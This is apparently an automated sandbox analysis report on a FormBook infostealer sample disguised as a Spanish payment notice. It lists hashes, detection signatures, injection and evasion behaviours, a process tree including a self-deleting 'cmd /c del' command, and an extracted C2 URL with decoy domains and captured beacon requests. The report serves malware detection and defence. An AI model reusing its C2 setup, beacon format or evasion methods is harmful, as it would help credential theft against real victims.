Windows Analysis Report
Notificaci#U00f3n de pago.exe

Overview

General Information

Sample Name: Notificaci#U00f3n de pago.exe
Analysis ID: 626150
MD5: 297e8b7f26a2eb1af366cac0202eca9a
SHA1: 4b3e36dcd7ea9785f93e43699e1224ad30626148
SHA256: 441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Notificaci#U00f3n de pago.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
    • Notificaci#U00f3n de pago.exe (PID: 6968 cmdline: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 6596 cmdline: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}
Source | Rule | Description | Author | Strings
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      Source | Rule | Description | Author | Strings
      8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          No Sigma rule has matched
          No Snort rule has matched

          AV Detection

          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
          Source: Notificaci#U00f3n de pago.exe, Virustotal: Detection: 21%
          Source: Notificaci#U00f3n de pago.exe, ReversingLabs: Detection: 41%
          Source: Notificaci#U00f3n de pago.exe, Joe Sandbox ML: detected
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Notificaci#U00f3n de pago.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Notificaci#U00f3n de pago.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe, Code function: 4x nop then pop edi, 8_2_004172F6
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe, Code function: 4x nop then pop edi, 8_2_00417FEB
          Source: C:\Windows\SysWOW64\WWAHost.exe, Code function: 4x nop then pop edi, 14_2_00A772F6
          Source: C:\Windows\SysWOW64\WWAHost.exe, Code function: 4x nop then pop edi, 14_2_00A77FEB

          Networking

          Source: C:\Windows\explorer.exe, Network Connect: 104.195.7.239 80
          Source: C:\Windows\explorer.exe, Domain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exe, Network Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exe, Network Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exe, Domain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exe, Domain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exe, Domain query: www.evertribute.com
          Source: Malware configuration extractor, URLs: www.hkqhdq.com/d6fp/
          Source: Joe Sandbox View, ASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global traffic, HTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1 Host: www.evertribute.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1 Host: www.theguiriguide.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1 Host: www.librevillegabon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 192.0.78.25 192.0.78.25
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt-bh
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown, DNS traffic detected: queries for: www.evertribute.com
          Source: global traffic, HTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1 Host: www.evertribute.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1 Host: www.theguiriguide.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1 Host: www.librevillegabon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          Source: Yara match, File source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
